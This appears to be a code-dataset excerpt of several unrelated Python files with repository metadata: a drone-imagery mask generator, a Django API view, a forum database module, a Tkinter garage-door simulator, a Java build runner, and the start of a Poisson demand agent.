c998cff8c1a24f25ddb54c9444ec21d5f87c9ecc
| 1,762
|
py
|
Python
|
brainforest/s_create_inputs.py
|
binello7/swisssmartfarming
|
40eef7b1726bc47d320ab12507479d836592138b
|
[
"MIT"
] | 2
|
2020-08-03T10:05:14.000Z
|
2021-03-30T13:18:39.000Z
|
brainforest/s_create_inputs.py
|
binello7/swisssmartfarming
|
40eef7b1726bc47d320ab12507479d836592138b
|
[
"MIT"
] | 6
|
2021-03-19T12:41:16.000Z
|
2021-09-26T21:21:40.000Z
|
brainforest/s_create_inputs.py
|
binello7/swisssmartfarming
|
40eef7b1726bc47d320ab12507479d836592138b
|
[
"MIT"
] | 3
|
2020-05-13T23:57:04.000Z
|
2020-06-18T09:37:17.000Z
|
from data_interface import Dataset, Data_Interface
from utils import functions as ufunc
import geopandas as gpd
import matplotlib.pyplot as plt
import numpy as np
import os
import rasterio as rio
import rasterio.mask as riom
import shapely
from IPython import embed
import sys
sys.path.append('/home/seba/Projects/swisssmartfarming')
rgb_path = ('/media/seba/Samsung_2TB/forest-project/qgis/gubler/rgb/'
'20200626_flight2_blackfly_rgb_transparent_mosaic_group1.tif')
ms_path = ('/media/seba/Samsung_2TB/forest-project/qgis/gubler/nir/'
'20200626_flight2_photonfocus_nir_transparent_reflectance_group1.tif')
masks_path = ('/media/seba/Samsung_2TB/forest-project/qgis/gubler/shapes/'
'trees.shp')
boundary_path = ('/media/seba/Samsung_2TB/forest-project/qgis/gubler/shapes/'
'boundary.shp')
dataset = rio.open(rgb_path)
shapefile = gpd.read_file(masks_path)
shapes = shapefile.geometry
# (img_mask, transf_mask) = riom.mask(dataset, shapes)
# img_mask = np.swapaxes(img_mask, 0, 2)
# plt.imshow(img_mask[:,:,0:3])
boundary = gpd.read_file(boundary_path)
tree_masks = gpd.read_file(masks_path)
dataset = Dataset(
name='gubler',
date='20200626',
rgb_path=rgb_path,
ms_path=ms_path,
mask_shapefile=tree_masks,
outer_shapefile=boundary,
rgb_bands_to_read=[0, 1, 2],
ms_bands_to_read=None,
)
dataset = [dataset]
di_train = Data_Interface(dataset, {'tree': 1, 'car': 2})
img, msk = di_train.get_pair()
# plt.imshow(msk)
save_path = '/media/seba/Samsung_2TB/forest-project/qgis/gubler/train'
di_train.save(save_path=save_path)
# x1003_path = '/media/seba/Samsung_2TB/forest-project/qgis/gubler/train/masks/x1003_y1009.png'
# x1003 = ufunc.read_img2array(x1003_path)
| 28.885246
| 95
| 0.746311
| 257
| 1,762
| 4.875486
| 0.33463
| 0.043097
| 0.062251
| 0.09577
| 0.269753
| 0.237829
| 0.237829
| 0.237829
| 0.237829
| 0.164405
| 0
| 0.041885
| 0.132804
| 1,762
| 60
| 96
| 29.366667
| 0.778141
| 0.15437
| 0
| 0
| 0
| 0
| 0.32861
| 0.30027
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.275
| 0
| 0.275
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c99a5abd3c9530802736be82134167242a054f72
| 574
|
py
|
Python
|
profiles_api/views.py
|
Vinutha2905/Python_RestAPI
|
4c185d37d32c3b5f00154f4be1b4ad0d2fab6d66
|
[
"MIT"
] | null | null | null |
profiles_api/views.py
|
Vinutha2905/Python_RestAPI
|
4c185d37d32c3b5f00154f4be1b4ad0d2fab6d66
|
[
"MIT"
] | null | null | null |
profiles_api/views.py
|
Vinutha2905/Python_RestAPI
|
4c185d37d32c3b5f00154f4be1b4ad0d2fab6d66
|
[
"MIT"
] | null | null | null |
from rest_framework.views import APIView
from rest_framework.response import Response
class HelloApiView(APIView):
"""TEST API VIEW"""
def get(self, request, format=None):
"""Returns a list of API features"""
an_apiview=[
'Uses HTTP methods as function (get,post, put, delete, patch)'
'Is Similar to a traditional Django View'
'Gives you the most control over your application logic'
'Is mapped manually to the URLs'
]
return Response({'message':'Hello', 'an_apiview': an_apiview})
| 31.888889
| 74
| 0.642857
| 72
| 574
| 5.055556
| 0.736111
| 0.074176
| 0.093407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.264808
| 574
| 17
| 75
| 33.764706
| 0.862559
| 0.076655
| 0
| 0
| 0
| 0
| 0.39499
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.181818
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c99e1e3eaa5ae563327d390c5f49ea33d97c4ae8
| 911
|
py
|
Python
|
forumdb.py
|
fatih-iver/Intro-to-Relational-Databases
|
28528132378436d6dd1f1bdec96d1e7e285b4e4d
|
[
"MIT"
] | null | null | null |
forumdb.py
|
fatih-iver/Intro-to-Relational-Databases
|
28528132378436d6dd1f1bdec96d1e7e285b4e4d
|
[
"MIT"
] | null | null | null |
forumdb.py
|
fatih-iver/Intro-to-Relational-Databases
|
28528132378436d6dd1f1bdec96d1e7e285b4e4d
|
[
"MIT"
] | null | null | null |
# "Database code" for the DB Forum.
import psycopg2
import bleach
DNAME = "forum"
#POSTS = [("This is the first post.", datetime.datetime.now())]
def get_posts():
"""Return all posts from the 'database', most recent first."""
db = psycopg2.connect(database=DNAME)
c = db.cursor()
c.execute("select content, time from posts order by time desc")
rows = c.fetchall()
db.close()
return rows
#def get_posts():
#"""Return all posts from the 'database', most recent first."""
#return reversed(POSTS)
def add_post(content):
"""Add a post to the 'database' with the current timestamp."""
db = psycopg2.connect(database=DNAME)
c = db.cursor()
c.execute("INSERT INTO posts values (%s) ", (bleach.clean(content),))
db.commit()
db.close()
#def add_post(content):
#"""Add a post to the 'database' with the current timestamp."""
#POSTS.append((content, datetime.datetime.now()))
| 24.621622
| 71
| 0.675082
| 130
| 911
| 4.7
| 0.392308
| 0.072013
| 0.062193
| 0.055646
| 0.533552
| 0.533552
| 0.533552
| 0.533552
| 0.533552
| 0.533552
| 0
| 0.003968
| 0.170143
| 911
| 36
| 72
| 25.305556
| 0.804233
| 0.485181
| 0
| 0.375
| 0
| 0
| 0.18931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9a08b6c821aa60ac0ac2219e490a38ed9d96387
| 19,553
|
py
|
Python
|
src/apps/Door.py
|
sdunlap-afit/hilics
|
ae06113365817e4240fe894d3dfd784991c78102
|
[
"Apache-2.0"
] | 2
|
2019-09-27T15:45:46.000Z
|
2021-07-28T15:02:21.000Z
|
src/apps/Door.py
|
sdunlap-afit/hilics
|
ae06113365817e4240fe894d3dfd784991c78102
|
[
"Apache-2.0"
] | 3
|
2020-09-25T13:40:56.000Z
|
2020-11-03T20:38:32.000Z
|
src/apps/Door.py
|
sdunlap-afit/hilics
|
ae06113365817e4240fe894d3dfd784991c78102
|
[
"Apache-2.0"
] | 2
|
2020-05-29T16:58:55.000Z
|
2021-04-27T23:52:17.000Z
|
#!/usr/bin/env python3
#
# IP: HILICS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import Tkinter as tk
from Tkinter.font import Font
except ImportError:
import tkinter as tk
from tkinter.font import Font
from PIL import Image, ImageTk
import threading
import time
from sims.DoorSim import DoorSim
from widgets.AlarmCircle import AlarmCircle
class Door(tk.Frame):
def __init__(self, master=None, default_bg=None, default_fg=None, width=800, height=480):
self.master = master
super().__init__(master)
self.default_bg = default_bg
self.default_fg = default_fg
self.high_color = '#EC7600'
self.low_color = '#678CB1'
self.alarm_color = '#C00000'
self.door_color = '#152020'
self.green_color = '#93C763'
self.default_width = width
self.default_height = height
self.door_pos = 0
self.panels = []
self.doorsim = DoorSim()
self.pack()
self.create_widgets()
self.running = True
self.thread = threading.Thread(target=self.worker_thread)
self.thread.setDaemon(True)
self.thread.start()
self.thread2 = threading.Thread(target=self.sim_thread)
self.thread2.setDaemon(True)
self.thread2.start()
def clean_up(self):
self.running = False
self.thread.join(1.0)
self.thread2.join(1.0)
self.doorsim.close()
self.master.destroy()
def config_bg(self, wid):
if not self.default_bg is None:
wid['bg'] = self.default_bg
def config_fg(self, wid):
if not self.default_fg is None:
wid['fg'] = self.default_fg
def config_frame(self, frame):
frame['borderwidth'] = 1
frame['relief'] = tk.RIDGE
frame.pack_propagate(0)
frame.grid_propagate(0)
self.config_bg(frame)
def config_btn(self, btn):
btn['font'] = Font(root=self.master, family='Helvetica', size=18)
btn['width'] = 8
btn['height'] = 2
btn['activebackground'] = self.default_bg
btn['activeforeground'] = self.default_fg
btn['bd'] = 0
btn['highlightthickness'] = 1
btn['relief'] = 'ridge'
self.config_bg(btn)
self.config_fg(btn)
def config_label(self, lab):
self.config_bg(lab)
self.config_fg(lab)
def sim_thread(self):
while self.running:
try:
self.doorsim.update()
time.sleep(0.01)
except Exception as e:
print(e)
def worker_thread(self):
while self.running:
try:
self.update_buttons()
self.update_indicators()
self.update_motor()
self.update_alarms()
self.update_door(int(self.doorsim.doorpos))
self.update_switches()
time.sleep(0.01)
except Exception as e:
print(e)
def update_alarms(self):
self.top_crash_alarm.update(self.doorsim.top_alarm)
self.btm_crash_alarm.update(self.doorsim.btm_alarm)
self.motor_alarm.update(self.doorsim.motor_alarm)
def update_switches(self):
if self.doorsim.open_switch:
self.canvas.itemconfig(self.open_switch, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.open_switch, fill=self.low_color , outline=self.low_color )
if self.doorsim.closed_switch:
self.canvas.itemconfig(self.close_switch, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.close_switch, fill=self.low_color , outline=self.low_color)
if self.doorsim.prox_switch:
self.canvas.itemconfig(self.prox_switch, fill=self.high_color, outline=self.high_color)
self.canvas.itemconfig(self.car, state='normal')
else:
self.canvas.itemconfig(self.prox_switch, fill=self.low_color , outline=self.low_color)
self.canvas.itemconfig(self.car, state='hidden')
if self.doorsim.impact_switch:
self.canvas.itemconfig(self.impact_switch, fill=self.high_color, outline=self.high_color)
self.canvas.itemconfig(self.explosion, state='normal')
else:
self.canvas.itemconfig(self.impact_switch, fill=self.low_color , outline=self.low_color)
self.canvas.itemconfig(self.explosion, state='hidden')
def update_motor(self):
if self.doorsim.motor_up:
self.canvas.itemconfig(self.motor_up, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.motor_up, fill=self.low_color , outline=self.low_color )
if self.doorsim.motor_down:
self.canvas.itemconfig(self.motor_down, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.motor_down, fill=self.low_color , outline=self.low_color )
def update_buttons(self):
if self.doorsim.open_btn:
self.canvas.itemconfig(self.open_btn, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.open_btn, fill=self.low_color , outline=self.low_color )
if self.doorsim.close_btn:
self.canvas.itemconfig(self.close_btn, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.close_btn, fill=self.low_color , outline=self.low_color )
if self.doorsim.stop_btn:
self.canvas.itemconfig(self.stop_btn, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.stop_btn, fill=self.low_color , outline=self.low_color )
def update_indicators(self):
if self.doorsim.open_ind:
self.canvas.itemconfig(self.open_ind, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.open_ind, fill=self.low_color , outline=self.low_color )
if self.doorsim.closed_ind:
self.canvas.itemconfig(self.closed_ind, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.closed_ind, fill=self.low_color , outline=self.low_color )
if self.doorsim.ajar_ind:
self.canvas.itemconfig(self.ajar_ind, fill=self.high_color, outline=self.high_color)
else:
self.canvas.itemconfig(self.ajar_ind, fill=self.low_color , outline=self.low_color )
def update_door(self, pos):
# Dead zone at top of door (stops from opening completely)
#if pos < 10:
# pos = 10
if not self.door_pos == pos:
self.door_pos = pos # 0 - 100
panel_height = 75 # pixels
pos = int(pos * 0.9) + 10.0
coords = self.canvas.coords(self.door_rect)
startx = coords[0] + 2
starty = coords[1] + 2
endx = coords[2] - 2
endy = coords[3] - 2
if len(self.panels) < 1:
self.canvas.tag_raise(self.car)
num_panels = 1 + int((endy - starty) / panel_height)
for __ in range(0, num_panels):
p = self.canvas.create_rectangle(0, 0, 1, 1, outline=self.door_color, fill=self.door_color, state='hidden')
self.panels.append(p)
self.canvas.tag_raise(self.explosion)
#print(self.panels)
next_panel_endy = starty + int(((endy - starty) * pos) / 100)
for p in self.panels:
if next_panel_endy < starty:
self.canvas.itemconfig(p, state='hidden')
else:
sy = next_panel_endy - panel_height
ey = next_panel_endy
next_panel_endy = sy - 2
if sy < starty:
sy = starty
self.canvas.coords(p, startx, sy, endx, ey)
self.canvas.itemconfig(p, state='normal')
#self.canvas.pack()
def open_btn_click(self, event):
self.doorsim.open_btn = not self.doorsim.open_btn
def close_btn_click(self, event):
self.doorsim.close_btn = not self.doorsim.close_btn
def stop_btn_click(self, event):
self.doorsim.stop_btn = not self.doorsim.stop_btn
def round_rectangle(self, canvas, x1, y1, x2, y2, radius=25, **kwargs):
points = [x1+radius, y1,
x1+radius, y1,
x2-radius, y1,
x2-radius, y1,
x2, y1,
x2, y1+radius,
x2, y1+radius,
x2, y2-radius,
x2, y2-radius,
x2, y2,
x2-radius, y2,
x2-radius, y2,
x1+radius, y2,
x1+radius, y2,
x1, y2,
x1, y2-radius,
x1, y2-radius,
x1, y1+radius,
x1, y1+radius,
x1, y1]
return canvas.create_polygon(points, kwargs, smooth=True)
def setup_frame1(self):
frame = tk.Frame(self, width=800, height=400)
self.config_frame(frame)
frame.grid(row = 0, column=0, columnspan=1, rowspan=1)
# lab = tk.Label(frame, text='Door', font=("Helvetica", 16))
# self.config_label(lab)
# lab.grid(column=1, row=0, columnspan=1, pady=10)
# frame.grid_columnconfigure(0, weight=1)
# frame.grid_columnconfigure(2, weight=1)
self.canvas = tk.Canvas(frame, width=800, height=400, bd=0, highlightthickness=0, relief='ridge')
self.config_bg(self.canvas)
########## Door Frame ##########
width = 300
height = 300
sx = (800 - width) / 2
sy = (400 - height) / 2
ex = sx + width
ey = sy + height
coords = [sx, sy, ex, ey]
self.door_rect = self.canvas.create_rectangle(coords[0], coords[1], coords[2], coords[3], outline=self.default_fg, fill=self.default_fg)
font = 'Helvetica 16 bold'
r = 15
self.btm_crash_alarm = AlarmCircle(self.canvas, sx + 100, ey + 25, r, self.alarm_color, self.default_bg, 'CRASH!', font)
self.top_crash_alarm = AlarmCircle(self.canvas, sx + 100, sy - 25, r, self.alarm_color, self.default_bg, 'CRASH!', font)
x = sx + (ex - sx) / 2
y = ey - 10
img = Image.open('images/explosion.png')
img.thumbnail((250, 250), Image.ANTIALIAS)
self.explosion_img_junk = ImageTk.PhotoImage(img)
self.explosion = self.canvas.create_image(x, y, anchor='s', image=self.explosion_img_junk)
img = Image.open('images/Car1.png')
img.thumbnail((250, 250), Image.ANTIALIAS)
self.car_img_junk = ImageTk.PhotoImage(img)
self.car = self.canvas.create_image(x, y, anchor='s', image=self.car_img_junk)
########## Limit Switches ##########
sx = coords[0] - 30
sy = coords[1] + 20
ex = sx + 20
ey = sy + 20
self.open_switch = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.low_color)
self.canvas.create_text(sx+10, sy-8, anchor='c', text = 'I:0/0', fill=self.default_fg)
self.canvas.create_text(sx-5, sy+10, anchor='e', text = 'Limit', font=("Helvetica", 10), fill=self.default_fg)
sx = coords[0] - 30
sy = coords[3] - 40
ex = sx + 20
ey = sy + 20
self.close_switch = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.low_color)
self.canvas.create_text(sx+10, sy-8, anchor='c', text = 'I:0/1', fill=self.default_fg)
self.canvas.create_text(sx-5, sy+10, anchor='e', text = 'Limit', font=("Helvetica", 10), fill=self.default_fg)
sx = coords[2] + 10
sy = coords[3] - (height / 2) - 10
ex = sx + 20
ey = sy + 20
self.impact_switch = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.low_color, fill=self.low_color)
self.canvas.create_text(sx+10, sy-8, anchor='c', text = 'I:0/6', fill=self.default_fg)
self.canvas.create_text(ex+5, sy+10, anchor='w', text = 'Impact', font=("Helvetica", 10), fill=self.default_fg)
sx = coords[2] + 10
sy = coords[3] - 40
ex = sx + 20
ey = sy + 20
self.prox_switch = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.low_color, fill=self.low_color)
self.canvas.create_text(sx+10, sy-8, anchor='c', text = 'I:0/5', fill=self.default_fg)
self.canvas.create_text(ex+5, sy+10, anchor='w', text = 'Proximity', font=("Helvetica", 10), fill=self.default_fg)
########## Motor Indicators ##########
sx = coords[2] + 75
sy = coords[1] + 10
ex = sx + 50
ey = sy + 40
self.motor_up = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.low_color)
self.motor_alarm = AlarmCircle(self.canvas, sx, ey + 25, r, self.alarm_color, self.default_bg, 'ALARM!', font)
m = sx + (ex - sx) / 2
offset = 9
self.canvas.create_line(sx+offset, ey-offset, m, sy+offset, fill=self.default_bg, width=5)
self.canvas.create_line(m, sy+offset, ex-offset, ey-offset, fill=self.default_bg, width=5)
self.canvas.create_text(sx-5, sy+20, anchor='e', text = 'O:0/0', fill=self.default_fg)
sx = sx + 52
ex = sx + 50
ey = sy + 40
self.motor_down = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.low_color)
m = sx + (ex - sx) / 2
self.canvas.create_line(sx+offset, sy+offset, m, ey-offset, fill=self.default_bg, width=5)
self.canvas.create_line(m, ey-offset, ex-offset, sy+offset, fill=self.default_bg, width=5)
self.canvas.create_text(ex+5, sy+20, anchor='w', text = 'O:0/1', fill=self.default_fg)
self.canvas.create_text(sx-1, sy-15, anchor='c', text = 'Motor', font=("Helvetica", 14), fill=self.default_fg)
########## Button Panel ##########
ht = 200
wd = 125
sx = 10
sy = 380 - ht
ex = sx + wd
ey = sy + ht
#rect = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.default_fg)
self.round_rectangle(self.canvas, sx, sy, ex, ey, radius=50, outline=self.default_fg, fill=self.default_fg)
x = sx + ((ex - sx) / 2)
y = sy + 20
self.canvas.create_text(x, y, anchor='c', text = 'Buttons', font=("Helvetica", 14), fill=self.default_bg)
r = 20
x = sx + ((ex - sx) / 2)
y = sy + 15 + (1 * (ey - sy) / 4)
self.open_btn = self.round_rectangle(self.canvas, x-r, y-r, x+r, y+r, radius=20, outline=self.default_fg, fill=self.low_color)
#self.open_btn = self.canvas.create_oval(x-r, y-r, x+r, y+r, outline=self.default_fg, fill=self.low_color)
self.canvas.tag_bind(self.open_btn, '<Button-1>', self.open_btn_click)
self.canvas.create_text(x - r - 2, y, anchor='e', text = 'I:0/2', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'OPEN', fill=self.default_bg)
x = sx + ((ex - sx) / 2)
y = sy + 15 + (2 * (ey - sy) / 4)
self.close_btn = self.round_rectangle(self.canvas, x-r, y-r, x+r, y+r, radius=20, outline=self.default_fg, fill=self.low_color)
self.canvas.tag_bind(self.close_btn, '<Button-1>', self.close_btn_click)
self.canvas.create_text(x - r - 2, y, anchor='e', text = 'I:0/3', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'CLOSE', fill=self.default_bg)
x = sx + ((ex - sx) / 2)
y = sy + 15 + (3 * (ey - sy) / 4)
self.stop_btn = self.round_rectangle(self.canvas, x-r, y-r, x+r, y+r, radius=20, outline=self.default_fg, fill=self.low_color)
self.canvas.tag_bind(self.stop_btn, '<Button-1>', self.stop_btn_click)
self.canvas.create_text(x - r - 2, y, anchor='e', text = 'I:0/4', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'STOP', fill=self.default_bg)
########## Car Button ##########
w = 65
h = 40
x = (sx + ((ex - sx) / 2)) - w/2
y = sy - h - h
rect = self.round_rectangle(self.canvas, x, y, x+w, y+h, radius=20, outline=self.green_color, fill=self.green_color)
lab = self.canvas.create_text(x + w/2, y+h/2, anchor='c', text = 'Car', fill=self.default_bg, font='Helvetica 12 bold')
self.canvas.tag_bind(rect, '<Button-1>', self.doorsim.begin_car)
self.canvas.tag_bind(lab, '<Button-1>', self.doorsim.begin_car)
########## Indicator Panel ##########
ht = 200
wd = 125
sx = 790 - wd
sy = 380 - ht
ex = sx + wd
ey = sy + ht
#rect = self.canvas.create_rectangle(sx, sy, ex, ey, outline=self.default_fg, fill=self.default_fg)
self.round_rectangle(self.canvas, sx, sy, ex, ey, radius=50, outline=self.default_fg, fill=self.default_fg)
x = sx + ((ex - sx) / 2)
y = sy + 20
self.canvas.create_text(x, y, anchor='c', text = 'Indicators', font=("Helvetica", 14), fill=self.default_bg)
r = 20
x = sx + ((ex - sx) / 2)
y = sy + 15 + (1 * (ey - sy) / 4)
self.open_ind = self.canvas.create_oval(x-r, y-r, x+r, y+r, outline=self.default_fg, fill=self.low_color)
self.canvas.create_text(x - r - 2, y, anchor='e', text = 'O:0/2', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'OPEN', fill=self.default_bg)
x = sx + ((ex - sx) / 2)
y = sy + 15 + (2 * (ey - sy) / 4)
self.closed_ind = self.canvas.create_oval(x-r, y-r, x+r, y+r, outline=self.default_fg, fill=self.low_color)
self.canvas.create_text(x - r - 2, y, anchor='e', text = 'O:0/3', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'CLOSE', fill=self.default_bg)
x = sx + ((ex - sx) / 2)
y = sy + 15 + (3 * (ey - sy) / 4)
self.ajar_ind = self.canvas.create_oval(x-r, y-r, x+r, y+r, outline=self.default_fg, fill=self.low_color)
self.canvas.create_text(x - r - 2, y, anchor='e', text = 'O:0/4', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'AJAR', fill=self.default_bg)
self.canvas.pack()
def normal_speed_clk(self):
self.doorsim.time_scale = 1.0
def double_speed_clk(self):
self.doorsim.time_scale = 2.0
def quad_speed_clk(self):
self.doorsim.time_scale = 4.0
def setup_bottom_frame(self):
frame = tk.Frame(self, width=self.default_width, height=80)
self.config_frame(frame)
frame.grid(row = 1, column=0, columnspan=1, rowspan=1)
self.normal_speed = tk.Button(frame, text='x1 Speed', command=self.normal_speed_clk)
self.config_btn(self.normal_speed)
self.normal_speed.place(relx=0.10, rely=0.5, anchor=tk.CENTER)
self.quad_speed = tk.Button(frame, text='x4 Speed', command=self.quad_speed_clk)
self.config_btn(self.quad_speed)
self.quad_speed.place(relx=0.280, rely=0.5, anchor=tk.CENTER)
self.ccrCanvas = tk.Canvas(frame, bg=self.default_bg, width=77,height=77, bd=0, highlightthickness=0, relief='ridge')
self.ccrCanvas.place(relx=0.5, rely=0.5, anchor=tk.CENTER)
img = Image.open('./images/ccr_logo.png').resize((77, 77), Image.ANTIALIAS)
self.ccrImage = ImageTk.PhotoImage(img)
self.ccrCanvas.create_image(0,0,image=self.ccrImage,anchor="nw")
self.logoCanvas = tk.Canvas(frame, bg=self.default_bg, width=180,height=77, bd=0, highlightthickness=0, relief='ridge')
self.logoCanvas.place(relx=0.680, rely=0.5, anchor=tk.CENTER)
self.logoImage = ImageTk.PhotoImage(file='./images/afit_logo.png')
self.logoCanvas.create_image(0,0,image=self.logoImage,anchor="nw")
self.quit = tk.Button(frame, text='Back', command=self.clean_up)
self.config_btn(self.quit)
self.quit.place(relx=0.9, rely=0.5, anchor=tk.CENTER)
def create_widgets(self):
self.master.minsize(width=self.default_width, height=self.default_height)
self.master.maxsize(width=self.default_width, height=self.default_height)
self.setup_frame1()
self.setup_bottom_frame()
| 28.012894
| 138
| 0.646499
| 3,018
| 19,553
| 4.054672
| 0.10603
| 0.080902
| 0.060145
| 0.054915
| 0.626706
| 0.588461
| 0.520879
| 0.476342
| 0.423143
| 0.39781
| 0
| 0.033263
| 0.205084
| 19,553
| 697
| 139
| 28.053085
| 0.754037
| 0.066384
| 0
| 0.259947
| 0
| 0
| 0.034856
| 0.002375
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066313
| false
| 0
| 0.026525
| 0
| 0.098143
| 0.005305
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9a1e099a815ae4cb966de4d518a0c2e63b69ddd
| 1,925
|
py
|
Python
|
java/run.py
|
foxtrotzulu94/LanguageBenchmarkGame
|
29c92c47c860d426409047a8408eaa52284a0cff
|
[
"MIT"
] | null | null | null |
java/run.py
|
foxtrotzulu94/LanguageBenchmarkGame
|
29c92c47c860d426409047a8408eaa52284a0cff
|
[
"MIT"
] | null | null | null |
java/run.py
|
foxtrotzulu94/LanguageBenchmarkGame
|
29c92c47c860d426409047a8408eaa52284a0cff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
output_name = './build/libs/java.jar'
def setup():
import os, datetime, subprocess
if os.path.exists(os.path.join(os.getcwd(), "setup.log")):
print("'setup.log' exists. Java implementation setup correctly")
return
print("Watch for Errors - Requires Java SDK and Runtime")
try:
with open('setup.log', 'w') as logFile:
logFile.write("# This is an autogenerated file made by 'run.py' on {}\n".format(datetime.datetime.now()))
logFile.write("# => DO NOT DELETE THIS FILE OR SETUP WILL BE CALLED AGAIN\n")
logFile.flush()
subprocess.run(["javac", "-version"], stdout = logFile, stderr = logFile, check=True)
subprocess.run(["gradle", "-v"], stdout = logFile, stderr = logFile, check=True)
subprocess.run(["java", "-version"], stdout = logFile, stderr = logFile, check=True)
logFile.flush()
logFile.write("\n# Setup completed on {}".format(datetime.datetime.now()))
#end logFile
except Exception as e:
print(e)
if os.path.exists('setup.log'):
os.remove('setup.log')
#end run
def build():
import os, subprocess
# Use gradle's '--no-daemon' option to avoid keeping a process up that can interfere with our tests.
retcode = subprocess.call(["gradle", "fullBuild", "--no-daemon"])
if retcode != 0:
raise AssertionError("Build failed")
print("Built Java implementation as {}".format(output_name))
#end run
def run(cmd_args):
import subprocess
retcode = subprocess.call(["java", "-jar", output_name] + cmd_args)
if retcode != 0:
raise RuntimeError("Program run returned non-zero exit code")
#end run
if __name__=="__main__":
import sys, os
setup()
build()
if os.path.basename(sys.argv[0]) == os.path.basename(__file__):
run(sys.argv[1:])
# end main
| 34.375
| 117
| 0.61974
| 249
| 1,925
| 4.722892
| 0.457831
| 0.02551
| 0.020408
| 0.066327
| 0.123299
| 0.123299
| 0.123299
| 0.081633
| 0
| 0
| 0
| 0.002716
| 0.234805
| 1,925
| 55
| 118
| 35
| 0.795655
| 0.083117
| 0
| 0.105263
| 0
| 0
| 0.261092
| 0.011945
| 0
| 0
| 0
| 0
| 0.026316
| 1
| 0.078947
| false
| 0
| 0.105263
| 0
| 0.210526
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9a91a5cf9ffb0b7d6c657ce1005cb03ff51c2eb
| 1,784
|
py
|
Python
|
src/scse/modules/customer/demo_newsvendor_poisson_customer_order.py
|
bellmast/supply-chain-simulation-environment
|
af797c1d057e216184727fdd934ebd372d90f4d5
|
[
"Apache-2.0"
] | 26
|
2021-06-23T00:58:25.000Z
|
2022-03-29T19:41:18.000Z
|
src/scse/modules/customer/demo_newsvendor_poisson_customer_order.py
|
bellmast/supply-chain-simulation-environment
|
af797c1d057e216184727fdd934ebd372d90f4d5
|
[
"Apache-2.0"
] | null | null | null |
src/scse/modules/customer/demo_newsvendor_poisson_customer_order.py
|
bellmast/supply-chain-simulation-environment
|
af797c1d057e216184727fdd934ebd372d90f4d5
|
[
"Apache-2.0"
] | 13
|
2021-06-23T09:16:38.000Z
|
2022-03-22T20:01:19.000Z
|
"""
An agent representing the (retail) customer behavior following a Poisson distribution for demand.
"""
import networkx as nx
from scse.api.module import Agent
import numpy as np
import logging
logger = logging.getLogger(__name__)
class PoissonCustomerOrder(Agent):
_DEFAULT_MAX_MEAN = 10
def __init__(self, run_parameters):
simulation_seed = run_parameters['simulation_seed']
self._rng = np.random.RandomState(simulation_seed)
